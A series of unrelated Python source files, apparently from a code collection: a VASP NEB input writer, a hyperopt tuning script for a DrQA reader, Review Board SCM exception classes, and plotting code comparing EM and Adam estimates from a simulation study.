    def __init__(self,crystalAndGuest,sHostName,sGuestName,lsWindowDistanceStepAngstrom):
        """Initialise data for a VASP NEB calculation.
        [crystalAndGuest]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
        [sHostName]: string, name of host crystal.
        [sGuestName]: string, name of guest molecule.
        [lsWindowDistanceStepAngstrom]: list, of step sizes (Angstrom) for displacements from window position.
        """
        self.dtAtomsByChemicalSymbol= self._GetAtomsByChemicalSymbol(crystalAndGuest) # prior called dtElementTypeAtoms
        # header is shared by every image; it carries {0}/{1} placeholders filled later in Save()
        self.sPOSCARHeader= self._POSCARHeader(crystalAndGuest,sHostName,sGuestName)
        self.lsEachIntervalVASPOutput=[] # list covering each step-size; each element lists VASP output for all images of that step-size.
        self.lsWindowDistanceStepAngstrom= lsWindowDistanceStepAngstrom
        self.AddWindowImages(crystalAndGuest)
    def _GetAtomsByChemicalSymbol(self,crystal):
        """Return a dictionary which lists atoms by chemical element.
        [crystal]: Crystal.crystal.Crystal object.
        <retval>: dict, key: chemical symbol, value: list of atoms for this element.
        """
        dtAtomsByChemicalSymbol={}
        for thisAtom in crystal.dtAtoms.values():
            if thisAtom.sChemicalSymbol in dtAtomsByChemicalSymbol:
                dtAtomsByChemicalSymbol[thisAtom.sChemicalSymbol].append(thisAtom)
            else: dtAtomsByChemicalSymbol[thisAtom.sChemicalSymbol]=[thisAtom]
        return dtAtomsByChemicalSymbol
    def _POSCARHeader(self,crystal,sHostName,sGuestName):
        """Create header for VASP POSCAR file. Header contains placeholders for step size and image number [subsequently replaced in Save()].
        [crystal]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
        [sHostName]: string, name of host crystal.
        [sGuestName]: string, name of guest molecule.
        <retval>: string, POSCAR header.
        """
        # comment line mixes %-substitution (done now) with {0}/{1} str.format placeholders (filled in Save())
        sComment= "Guest %s NEB trajectory with {0:.2f} Angstrom steps in host %s, image {1}." % (sGuestName,sHostName)
        # comment line, scale factor (1.0), then the three Cartesian lattice vectors
        sHeader= "%s\n1.0\n %12.8f %12.8f %12.8f\n %12.8f %12.8f %12.8f\n %12.8f %12.8f %12.8f\n" % (sComment,
            *crystal.lsCartesianLatticeVectors[0],*crystal.lsCartesianLatticeVectors[1],*crystal.lsCartesianLatticeVectors[2])
        sElementTitleRow=" "
        sAtomCountRow=" "
        # build the element-symbols row and the per-element atom-count row, column-aligned
        for sChemicalSymbol,lsAtoms in self.dtAtomsByChemicalSymbol.items():
            iNumAtomsOfThisElement= len(lsAtoms)
            iNumCharsForElementCount= len(str(iNumAtomsOfThisElement))
            # each column must fit the wider of the symbol and its count
            iNumCharsForElementColumn= max(iNumCharsForElementCount,len(sChemicalSymbol))
            sFormat=" %%%ds" % iNumCharsForElementColumn
            sElementTitleRow+= sFormat % sChemicalSymbol
            sFormat=" %%%dd" % iNumCharsForElementColumn
            sAtomCountRow+= sFormat % iNumAtomsOfThisElement
        sHeader+=sElementTitleRow+"\n"+sAtomCountRow+"\nDirect\n"
        return sHeader
    def _POSCARBody(self,crystal):
        """Create body for VASP POSCAR file: fractional atom positions, grouped by element to match the header's counts.
        [crystal]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
        <retval>: string, POSCAR body.
        """
        sBody=""
        for lsAtoms in self.dtAtomsByChemicalSymbol.values():
            for thisAtom in lsAtoms:
                #arAtomCartesVector= cgeom.FractionalToCartesianVector(None,thisAtom.lsFracLatticePos,crystal.lsCartesianLatticeVectors)
                sBody+= " %12.8f %12.8f %12.8f\n" % (thisAtom.lsFracLatticePos[0],thisAtom.lsFracLatticePos[1],thisAtom.lsFracLatticePos[2])
        return sBody
    def AddWindowImages(self,crystalAndGuest):
        """Add initial images for all step sizes with the guest at the window.
        [crystalAndGuest]: Crystal.crystal.Crystal object, guest at the window position.
        """
        sPOSCARContent= self.sPOSCARHeader+self._POSCARBody(crystalAndGuest)
        # one image list per step size; each starts with the (shared) window image
        for fNotUsed in self.lsWindowDistanceStepAngstrom:
            self.lsEachIntervalVASPOutput.append( [sPOSCARContent] )
    def AddNextImage(self,crystalAndGuest,iGuestDisplaceIntervalIndex,bLeftDisplaceSide):
        """Add the next image (with the guest displaced from the window) for a specific step size and window side.
        [crystalAndGuest]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
        [iGuestDisplaceIntervalIndex]: int, index of step size in [lsWindowDistanceStepAngstrom]; an image is added for this step size only.
        [bLeftDisplaceSide]: bool, image on left of window; else on right of window.
        """
        # add a single image for a specific step size and side of the window
        sPOSCARContent= self.sPOSCARHeader+self._POSCARBody(crystalAndGuest)
        lsImages= self.lsEachIntervalVASPOutput[iGuestDisplaceIntervalIndex]
        # left-side images are prepended, right-side appended, so the list reads leftmost -> window -> rightmost
        lsImages.insert(0 if bLeftDisplaceSide else len(lsImages),sPOSCARContent)
    def Save(self,fnHostGuestStepSizeName,sHostGuestName,sRootOutputDir,sTrajectoryMethod,lsReplicaMetaDataForStepSize):
        """Create input files (below OutputDir/RefCode_Guest_StepSize/VASP/) for the VASP NEB calculation: a sub-directory for each image, each contains a POSCAR file for that image; sub-directories labelled from 00 to the last image number.
        [fnHostGuestStepSizeName]: function, HostGuestStepSizeName(sHostGuestName,fWindowDistanceStepAngstrom) giving specified host-guest-stepsize name for relevant files.
        [sHostGuestName]: string, crystal host-guest-step-size name.
        [sRootOutputDir]: string, root output directory.
        [sTrajectoryMethod]: string, trajectory method formal name.
        [lsReplicaMetaDataForStepSize]: list of dictionaries for each step size giving number of images.
        """
        for iThisGuestInterval,lsVASPOutput in enumerate(self.lsEachIntervalVASPOutput):
            for iImage,sPOSCAROutput in enumerate(lsVASPOutput,0):
                fWindowDistanceStepAngstrom= self.lsWindowDistanceStepAngstrom[iThisGuestInterval]
                sHostGuestStepSizeName= fnHostGuestStepSizeName(sHostGuestName,fWindowDistanceStepAngstrom)
                # zero-padded two-digit image sub-directory, e.g. VASP/03/
                sHostGuestStepSizeDir= f"{sRootOutputDir}{sHostGuestStepSizeName}/{sTrajectoryMethod}/VASP/{iImage:02}/"
                if not os.access(sHostGuestStepSizeDir,os.F_OK): os.makedirs(sHostGuestStepSizeDir)
                # images are ordered leftmost -> window -> rightmost, so the window image sits at index iNumLeftImages
                sWindowLabel= "[window] " if iImage==lsReplicaMetaDataForStepSize[iThisGuestInterval]['iNumLeftImages'] else ""
                with open(sHostGuestStepSizeDir+"POSCAR","w") as hFile:
                    # fill header placeholders: {0}=step size, {1}="<image> [window] of <total>"
                    hFile.write(sPOSCAROutput.format(fWindowDistanceStepAngstrom,"%d %sof %d" % (iImage+1,sWindowLabel,len(lsVASPOutput)),sWindowLabel))
|
<gh_stars>0
import itertools
import os
import subprocess
import numpy as np
import time
import datetime
from hyperopt import hp
import pandas as pd
# Configuration for a hyperopt (TPE) hyper-parameter search over the DrQA reader.
HomeDir = os.environ.get('HOME')
# os.chdir(os.path.join(HomeDir,"CS3244/DrQA"))
os.chdir(os.path.join(HomeDir,"DrQA"))
# print(os.getcwd())
top10_result = "validation/top10_result.csv"  # CSV of final metrics for the retrained best trials
hide_output = False  # if True, training output is redirected to /dev/null
MAX_EVALS = 1  # number of hyperopt evaluations to run
#### Fixed Parameters: passed unchanged to scripts/reader/train.py on every trial ##
fixed_params ={
    "--num-epoch" : 1,
    "--embedding-file": "glove.6B.200d.txt",
    "--model-name": "",  # filled in per-trial by objective()
    "--model-dir": "",   # filled in per-trial by objective()
    "--train-file": "ln_train-processed-corenlp.txt",
    "--dev-file": "ln_dev-processed-corenlp.txt",
    "--dev-json": "ln_dev.json",
    "--train-json": "ln_train.json",
    "--pretrained": "models/pre_trained_single/64_2_no_concat_200.mdl"
}
#### Hyper parameters: the hyperopt search space (hp.choice = categorical, hp.uniform = continuous) ###
params = {
    "--batch-size" : hp.choice('--batch-size',[32]),
    "--model-type" : hp.choice('--model-type',['rnn']),
    "--hidden-size": hp.choice('--hidden-size',[64]),
    "--doc-layers" : hp.choice('--doc-layers',[2]),
    "--question-layers" :hp.choice('--question-layers',[2]),
    "--rnn-type" :hp.choice('--rnn-type',['LSTM']),
    "--concat-rnn-layers" : hp.choice('--concat-rnn-layers',[False]),
    "--question-merge" :hp.choice('--question-merge',['self_attn']),
    "--dropout-emb" :hp.uniform('--dropout-emb',0,1),
    "--dropout-rnn" :hp.uniform('--dropout-rnn',0,1),
    "--dropout-rnn-output" :hp.choice('--dropout-rnn-output',[True,False]),
    "--grad-clipping" :hp.choice('--grad-clipping',[10]),
    "--weight-decay" :hp.uniform('--weight-decay',0,1),
    "--momentum" :hp.uniform('--momentum',0,1),
    "--fix-embedding" :hp.choice('--fix-embedding',[True,False]),
    "--tune-partial" : hp.choice('--tune-partial',[1000]),
    "--rnn-padding" :hp.choice('--rnn-padding',[True, False]),
    "--max-len" : hp.choice('--max-len',[15])}
def objective(param):
    """Hyperopt objective: train one DrQA reader configuration and return its negated dev F1 as the loss.
    [param]: dict of sampled hyper-parameter values (flag name -> value).
    <retval>: dict with 'loss' (negative F1, minimised by hyperopt), 'status', 'x' (the params) and 'time' (seconds).
    """
    t_start = time.time()
    # model name/dir are derived from the sampled values so each combination is unique
    model_name = "_".join(str(v) for v in param.values())
    model_dir = "models/val_models/" + model_name + "/"
    fixed_params["--model-name"] = model_name
    fixed_params["--model-dir"] = model_dir
    # assemble the training command: fixed flags first, then the sampled ones
    pieces = ["python scripts/reader/train.py"]
    for flag, value in fixed_params.items():
        pieces.append(flag + " " + str(value))
    for flag, value in param.items():
        pieces.append(flag + " " + str(value))
    CMD = " ".join(pieces)
    if hide_output:
        CMD += " &> /dev/null"
    os.system("bash -c \"" + CMD + "\"")
    # the training script records its best metrics (comma-separated) in <model>_best.txt
    with open(model_dir + model_name + "_best.txt", 'r') as log:
        log_ = log.readline().split(',')
    F1 = -float(log_[1])  # negated: hyperopt minimises the loss
    time_elapsed = time.time() - t_start
    print("Comb: " + str(ith[0]))
    print("F1: " + str(log_[1]) + " EM: " + str(log_[2]))
    print("Time Elapsed: " + str(datetime.timedelta(seconds=time_elapsed)))
    print("Time Remaining: " + str(datetime.timedelta(seconds=time_elapsed * (MAX_EVALS - ith[0]))))
    print("_" * 100)
    ith[0] += 1
    return {'loss': F1, 'status': STATUS_OK, 'x': param, 'time': time_elapsed}
from hyperopt import Trials
from hyperopt import fmin
from hyperopt import rand, tpe
from hyperopt import STATUS_OK
ith = [1]  # 1-based counter of completed combinations, read by objective() for progress reporting
tpe_algo = tpe.suggest
tpe_trials = Trials()
# run the TPE search over the `params` space defined above
best = fmin(fn = objective,space = params,algo=tpe_algo, trials= tpe_trials,
    max_evals = MAX_EVALS,rstate = np.random.RandomState(50))
print('Minimum loss attained with TPE: {:.4f}'.format(tpe_trials.best_trial['result']['loss']))
print(len(tpe_trials.results))
results = tpe_trials.results
# persist every trial's loss and parameters, sorted best-first
results_df = pd.DataFrame({'loss': [x['loss'] for x in results],
                           'x': [x['x'] for x in results]})
results_df = results_df.sort_values('loss', ascending=True)
results_df.to_csv('validation/data_frame_result.csv', sep=",")
# Retrain the best trials and log their final metrics.
# BUG FIX: previously this indexed `results` in raw trial order (not sorted by
# loss) and took int(len/20) of them - which is 0 for 10..19 trials and only 5%
# of larger runs; now sort by loss and retrain up to the 10 genuinely best.
best_trials = sorted(results, key=lambda r: r['loss'])[:min(10, len(results))]
with open(top10_result, 'w') as result:  # with-block: file closed even if a retrain fails
    header = ",".join(['epoch_best','F1_Dev_best','EM_Dev_best','S_Dev_best','E_Dev_best','Exact_Dev_best','F1_Train','EM_train','S_Train','E_Train','Exact_Train','Loss_Train'])
    result.write(header + "\n")
    for trial in best_trials:
        param = trial['x']
        # rebuild the same training command objective() used for this trial
        CMD = "python scripts/reader/train.py"
        model_name = "_".join(str(v) for v in param.values())
        model_dir = "models/val_models/" + model_name + "/"
        fixed_params["--model-name"] = model_name
        fixed_params["--model-dir"] = model_dir
        fixed_params["--num-epoch"] = 1
        for name, value in fixed_params.items():
            CMD += " " + name + " " + str(value)
        for name, value in param.items():
            CMD += " " + name + " " + str(value)
        if hide_output:
            CMD += " &> /dev/null"
        os.system("bash -c \"" + CMD + "\"")
        log_result = []
        # NOTE(review): objective() splits this file on ',', but here it was split on
        # ' '; kept as-is - confirm which delimiter <model>_best.txt actually uses.
        with open(model_dir + model_name + "_best.txt", 'r') as log:
            log_ = log.readline().split(' ')
        log_result.extend(log_)
        result.write(",".join(log_result) + "\n")
|
<gh_stars>0
import socket
from django.utils.translation import ugettext as _
from djblets.util.humanize import humanize_list
class SCMError(Exception):
    """Base class for all SCM (source-control) related errors."""

    def __init__(self, msg):
        super(SCMError, self).__init__(msg)
class ChangeSetError(SCMError):
    """Base class for errors relating to SCM changesets."""
    pass
class InvalidChangeNumberError(ChangeSetError):
    """Raised when a change number does not refer to a valid changeset."""

    def __init__(self):
        # No message: callers identify this error purely by its type.
        super(InvalidChangeNumberError, self).__init__(None)
class ChangeNumberInUseError(ChangeSetError):
    """Raised when a change number is already attached to another review request."""

    def __init__(self, review_request=None):
        super(ChangeNumberInUseError, self).__init__(None)
        # The review request currently holding this change number, if known.
        self.review_request = review_request
class EmptyChangeSetError(ChangeSetError):
    """Raised when a changeset exists but contains no changes."""

    def __init__(self, changenum):
        message = _('Changeset %s is empty') % changenum
        super(EmptyChangeSetError, self).__init__(message)
class InvalidRevisionFormatError(SCMError):
    """Indicates that a revision isn't in a recognizable format."""

    def __init__(self, path, revision, detail=None):
        message = ("The revision '%s' for '%s' isn't in a valid format"
                   % (revision, path))
        if detail:
            message = message + ': ' + detail
        super(InvalidRevisionFormatError, self).__init__(message)
        # Keep the pieces for programmatic inspection by callers.
        self.path = path
        self.revision = revision
        self.detail = detail
class FileNotFoundError(SCMError):
    """An error indicating a file (optionally at a revision) is missing from the repository.

    NOTE(review): this intentionally-or-not shadows Python's builtin
    FileNotFoundError for importers of this module - confirm callers expect that.
    """
    def __init__(self, path, revision=None, detail=None):
        from reviewboard.scmtools.core import HEAD
        # BUG FIX: was `revision == None`; identity comparison is correct for None.
        if revision is None or revision == HEAD:
            msg = "The file '%s' could not be found in the repository" % path
        else:
            msg = "The file '%s' (r%s) could not be found in the repository" \
                  % (path, revision)
        if detail:
            msg += ': ' + detail
        # BUG FIX: previously called Exception.__init__ directly, bypassing the
        # SCMError base that every sibling class initialises through.
        SCMError.__init__(self, msg)
        self.revision = revision
        self.path = path
        self.detail = detail
class RepositoryNotFoundError(SCMError):
    """An error indicating that a path does not represent a valid repository."""

    def __init__(self):
        message = _('A repository was not found at the '
                    'specified path.')
        super(RepositoryNotFoundError, self).__init__(message)
class AuthenticationError(SCMError):
    """An error representing a failed authentication for a repository.

    This takes a list of authentication types that are allowed. These
    are dependant on the backend, but are loosely based on SSH authentication
    mechanisms. Primarily, we respond to "password" and "publickey".

    This may also take the user's SSH key that was tried, if any.
    """
    def __init__(self, allowed_types=None, msg=None, user_key=None):
        # BUG FIX: the default was a mutable list ([]), shared across every call
        # of this constructor; use the None sentinel instead.
        if allowed_types is None:
            allowed_types = []
        if allowed_types:
            msg = _('Unable to authenticate against this repository using one '
                    'of the supported authentication types '
                    '(%(allowed_types)s).') % {
                'allowed_types': humanize_list(allowed_types),
            }
        elif not msg:
            msg = _('Unable to authenticate against this repository using one '
                    'of the supported authentication types.')
        SCMError.__init__(self, msg)
        self.allowed_types = allowed_types
        self.user_key = user_key
class UnverifiedCertificateError(SCMError):
    """An error representing an unverified HTTPS certificate."""

    def __init__(self, certificate):
        message = _('A verified HTTPS certificate is required '
                    'to connect to this repository.')
        super(UnverifiedCertificateError, self).__init__(message)
        # The unverified certificate, kept so callers can inspect or accept it.
        self.certificate = certificate
class UnsupportedSSHKeyError(SCMError):
    """An error representing an unsupported type of SSH key."""

    def __init__(self):
        super(UnsupportedSSHKeyError, self).__init__(
            _('This SSH key is not a valid RSA or DSS key.'))
class SSHKeyError(SCMError):
    """An error involving a host key on an SSH connection."""

    def __init__(self, hostname, key, message):
        # Local import - presumably to avoid a circular module import; confirm.
        from reviewboard.scmtools.sshutils import humanize_key
        super(SSHKeyError, self).__init__(message)
        self.hostname = hostname
        # Human-readable key fingerprint plus the raw key object.
        self.key = humanize_key(key)
        self.raw_key = key
class BadHostKeyError(SSHKeyError):
    """An error representing a bad or malicious key for an SSH connection."""
    def __init__(self, hostname, key, expected_key):
        from reviewboard.scmtools.sshutils import humanize_key
        # BUG FIX: the substitution dict previously included an unused
        # 'ip_address' entry computed via socket.gethostbyname(), performing a
        # blocking DNS lookup (which can itself raise socket.gaierror) for a
        # value the message never interpolates. It has been removed.
        SSHKeyError.__init__(
            self, hostname, key,
            _("Warning! The host key for server %(hostname)s does not match "
              "the expected key.\n"
              "It's possible that someone is performing a man-in-the-middle "
              "attack. It's also possible that the RSA host key has just "
              "been changed. Please contact your system administrator if "
              "you're not sure. Do not accept this host key unless you're "
              "certain it's safe!")
            % {
                'hostname': hostname,
            })
        # Humanized and raw forms of the key we expected to see.
        self.expected_key = humanize_key(expected_key)
        self.raw_expected_key = expected_key
class UnknownHostKeyError(SSHKeyError):
    """An error representing an unknown host key for an SSH connection."""

    def __init__(self, hostname, key):
        details = {
            'hostname': hostname,
            'ip': socket.gethostbyname(hostname),
        }
        message = _("The authenticity of the host '%(hostname)s (%(ip)s)' "
                    "couldn't be determined.") % details
        super(UnknownHostKeyError, self).__init__(hostname, key, message)
|
<filename>plots/plots_simulation_main.py
#! /usr/bin/env python3
import numpy as np
from scipy.stats import gaussian_kde as kde
import matplotlib.pyplot as plt
from matplotlib import rc
rc('font',**{'family':'serif','serif':['Times']})
rc('text', usetex=True)
import argparse

parser = argparse.ArgumentParser()
# "-M" selects which simulation run (number of events) to plot.
# Bug fix: the original used const=True with type=int, so a bare "-M" flag
# (allowed by nargs="?") set args.M to the boolean True, producing result
# paths like ".../estimation_True/". const=250 keeps a bare flag consistent
# with the default.
parser.add_argument("-M", type=int, dest="M", default=250, const=250, nargs="?",
                    help="Number of events used for inference. Default M=250.")
## Parse arguments
args = parser.parse_args()
M = args.M
## Truth
# Ground-truth simulation parameters; the dotted "Truth" vertical lines in
# every density plot below are drawn from these values.
alpha = np.array([0.01,0.05]); beta = np.array([0.07,0.03]); baseline = np.add.outer(alpha,beta)
mu = np.array([0.2,0.15]); mu_prime = np.array([0.1,0.25])
phi = np.array([0.8,0.85]); phi_prime = np.array([0.9,0.75])
# Total decay rates are the sums of the jump and phi parameters.
decay = mu + phi; decay_prime = mu_prime + phi_prime
## Estimates of baseline
# Load the EM and Adam (gradient ascent) estimates for this M and compare
# their sampling densities against the truth, one panel per (i, j) pair.
alpha_em = np.load('../results/simulation_main/estimation_'+str(M)+'/alpha_em.npy'); beta_em = np.load('../results/simulation_main/estimation_'+str(M)+'/beta_em.npy')
alpha_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/alpha_ga.npy'); beta_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/beta_ga.npy')
# Per-replication baseline matrices alpha_i + beta_j (outer sums).
baseline_em = np.array([np.add.outer(alpha_em[i], beta_em[i]) for i in range(alpha_em.shape[0])])
baseline_ga = np.array([np.add.outer(alpha_ga[i], beta_ga[i]) for i in range(alpha_ga.shape[0])])
fig, axs = plt.subplots(2, 2, constrained_layout=True)
for i in [0,1]:
	for j in [0,1]:
		# Shared support for both kernel density estimates.
		mmin = np.min([np.min(baseline_em[:,i,j]),np.min(baseline_ga[:,i,j])])
		mmax = np.max([np.max(baseline_em[:,i,j]),np.max(baseline_ga[:,i,j])])
		positions = np.linspace(mmin,mmax,num=250)
		kernel_em = kde(baseline_em[:,i,j], bw_method='silverman')
		kernel_ga = kde(baseline_ga[:,i,j], bw_method='silverman')
		axs[i,j].hist(baseline_em[:,i,j], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
		axs[i,j].hist(baseline_ga[:,i,j], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
		axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
		axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
		axs[i,j].axvline(x=baseline[i,j],ls='dotted',c='black', lw=3, label='Truth')
		# Single legend in the top-left panel only.
		if i == 0 and j == 0:
			axs[i,j].legend()
		axs[i,j].set_ylabel('Density')
		axs[i,j].set_xlabel('$\\hat{\\alpha}_{'+str(i+1)+'}+\\hat{\\beta}_{'+str(j+1)+'}$')
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/alpha_beta.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
## Estimates of jump
# Densities of the jump-parameter estimates: left column mu, right column
# mu_prime; rows index the two processes.
mu_em = np.load('../results/simulation_main/estimation_'+str(M)+'/mu_em.npy'); mu_prime_em = np.load('../results/simulation_main/estimation_'+str(M)+'/mu_prime_em.npy')
mu_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/mu_ga.npy'); mu_prime_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/mu_prime_ga.npy')
fig, axs = plt.subplots(2, 2, constrained_layout=True)
for i in [0,1]:
	for j in [0,1]:
		if j == 0:
			# Column 0: mu estimates.
			mmin = np.min([np.min(mu_em[:,i]),np.min(mu_ga[:,i])])
			mmax = np.max([np.max(mu_em[:,i]),np.max(mu_ga[:,i])])
			positions = np.linspace(mmin,mmax,num=250)
			kernel_em = kde(mu_em[:,i], bw_method='silverman')
			kernel_ga = kde(mu_ga[:,i], bw_method='silverman')
			axs[i,j].hist(mu_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
			axs[i,j].hist(mu_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
			axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
			axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
			axs[i,j].axvline(x=mu[i],ls='dotted',c='black', lw=3, label='Truth')
			if i == 0 and j == 0:
				axs[i,j].legend()
			axs[i,j].set_ylabel('Density')
			axs[i,j].set_xlabel('$\\hat{\\mu}_{'+str(i+1)+'}$')
		else:
			# Column 1: mu_prime estimates.
			mmin = np.min([np.min(mu_prime_em[:,i]),np.min(mu_prime_ga[:,i])])
			mmax = np.max([np.max(mu_prime_em[:,i]),np.max(mu_prime_ga[:,i])])
			positions = np.linspace(mmin,mmax,num=250)
			kernel_em = kde(mu_prime_em[:,i], bw_method='silverman')
			kernel_ga = kde(mu_prime_ga[:,i], bw_method='silverman')
			axs[i,j].hist(mu_prime_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
			axs[i,j].hist(mu_prime_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
			axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
			axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
			axs[i,j].axvline(x=mu_prime[i],ls='dotted',c='black', lw=3, label='Truth')
			if i == 0 and j == 0:
				axs[i,j].legend()
			axs[i,j].set_ylabel('Density')
			axs[i,j].set_xlabel('$\\hat{\\mu}^\\prime_{'+str(i+1)+'}$')
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/mu.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
## Estimates of decay
# Densities of the total decay estimates mu + phi (left column) and
# mu' + phi' (right column).
phi_em = np.load('../results/simulation_main/estimation_'+str(M)+'/phi_em.npy'); phi_prime_em = np.load('../results/simulation_main/estimation_'+str(M)+'/phi_prime_em.npy')
phi_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/phi_ga.npy'); phi_prime_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/phi_prime_ga.npy')
decay_em = mu_em + phi_em; decay_prime_em = mu_prime_em + phi_prime_em
decay_ga = mu_ga + phi_ga; decay_prime_ga = mu_prime_ga + phi_prime_ga
fig, axs = plt.subplots(2, 2, constrained_layout=True)
for i in [0,1]:
	for j in [0,1]:
		if j == 0:
			# Column 0: mu + phi.
			mmin = np.min([np.min(decay_em[:,i]),np.min(decay_ga[:,i])])
			mmax = np.max([np.max(decay_em[:,i]),np.max(decay_ga[:,i])])
			positions = np.linspace(mmin,mmax,num=250)
			kernel_em = kde(decay_em[:,i], bw_method='silverman')
			kernel_ga = kde(decay_ga[:,i], bw_method='silverman')
			axs[i,j].hist(decay_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
			axs[i,j].hist(decay_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
			axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
			axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
			axs[i,j].axvline(x=decay[i],ls='dotted',c='black', lw=3, label='Truth')
			if i == 0 and j == 0:
				axs[i,j].legend()
			axs[i,j].set_ylabel('Density')
			axs[i,j].set_xlabel('$\\hat{\\mu}_{'+str(i+1)+'}+\\hat{\\phi}_{'+str(i+1)+'}$')
		else:
			# Column 1: mu' + phi'.
			mmin = np.min([np.min(decay_prime_em[:,i]),np.min(decay_prime_ga[:,i])])
			mmax = np.max([np.max(decay_prime_em[:,i]),np.max(decay_prime_ga[:,i])])
			positions = np.linspace(mmin,mmax,num=250)
			kernel_em = kde(decay_prime_em[:,i], bw_method='silverman')
			kernel_ga = kde(decay_prime_ga[:,i], bw_method='silverman')
			axs[i,j].hist(decay_prime_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
			axs[i,j].hist(decay_prime_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
			axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
			axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
			axs[i,j].axvline(x=decay_prime[i],ls='dotted',c='black', lw=3, label='Truth')
			if i == 0 and j == 0:
				axs[i,j].legend()
			axs[i,j].set_ylabel('Density')
			axs[i,j].set_xlabel('$\\hat{\\mu}^\\prime_{'+str(i+1)+'}+\\hat{\\phi}^\\prime_{'+str(i+1)+'}$')
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/mu_phi.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
## Plots for asymptotic comparisons
# Stacked (2x1) version of the decay densities used for the paper's
# asymptotic comparison figure, with fixed x-limits per panel.
fig, axs = plt.subplots(2, 1, figsize=(3.2,4.8), constrained_layout=True)
for i in [0,1]:
	mmin = np.min([np.min(decay_em[:,i]),np.min(decay_ga[:,i])])
	mmax = np.max([np.max(decay_em[:,i]),np.max(decay_ga[:,i])])
	positions = np.linspace(mmin,mmax,num=250)
	kernel_em = kde(decay_em[:,i], bw_method='silverman')
	kernel_ga = kde(decay_ga[:,i], bw_method='silverman')
	axs[i].hist(decay_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
	axs[i].hist(decay_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
	axs[i].plot(positions, kernel_em(positions), lw=3, label='EM')
	axs[i].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
	axs[i].axvline(x=decay[i],ls='dotted',c='black', lw=3, label='Truth')
	# Hard-coded axis limits chosen for the publication layout.
	if i == 0:
		axs[i].legend()
		axs[i].set_xlim(0,2.75)
	else:
		axs[i].set_xlim(0,3.75)
	axs[i].set_ylabel('Density')
	axs[i].set_xlabel('$\\hat{\\mu}_{'+str(i+1)+'}+\\hat{\\phi}_{'+str(i+1)+'}$')
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/mu_phi_asy_'+str(M)+'.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
# Import KS scores
# Horizontal boxplot comparing Kolmogorov-Smirnov goodness-of-fit scores
# for the two estimation methods.
ks_em = np.load('../results/simulation_main/estimation_'+str(M)+'/ks_score_em.npy')
ks_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/ks_score_ga.npy')
fig, axes = plt.subplots()
bplot = axes.boxplot([ks_ga,ks_em],vert=False,labels=['Adam', 'EM'], widths=.5, patch_artist=True)
# Draw all boxplot line elements in black so only the fill carries color.
for element in ['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']:
	plt.setp(bplot[element], color='black')
axes.xaxis.grid(True)
axes.set_xlabel('Kolmogorov-Smirnov scores')
# Fill with colors
colors = ['orange', 'cornflowerblue']
for patch, color in zip(bplot['boxes'], colors):
	patch.set_facecolor(color)
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/ks_scores.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
## Vertical boxplot
# Same KS comparison drawn vertically for the paper's layout.
# Bug fix: the final line carried a stray trailing "|" (extraction artifact)
# which made the script a SyntaxError; it has been removed.
fig, axes = plt.subplots(figsize=(3.2,2.4))
bplot = axes.boxplot([ks_em,ks_ga],vert=True,labels=['EM','Adam'], widths=.5, patch_artist=True)
# Black outlines, colored fills (note the method order/colors are swapped
# relative to the horizontal plot above).
for element in ['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']:
	plt.setp(bplot[element], color='black')
axes.yaxis.grid(True)
axes.set_ylabel('KS scores')
axes.set_ylim(0,0.0875)
# Fill with colors
colors = ['cornflowerblue','orange']
for patch, color in zip(bplot['boxes'], colors):
	patch.set_facecolor(color)
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/ks_scores_vert_'+str(M)+'.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
import glob
import os
import pathlib
import argparse
import torch
from lib.pl_utils import UnNormalize
from model_define import StyleTransfer
import torchvision.transforms as transforms
from PIL import Image
import clip
import torchvision.utils as vutils
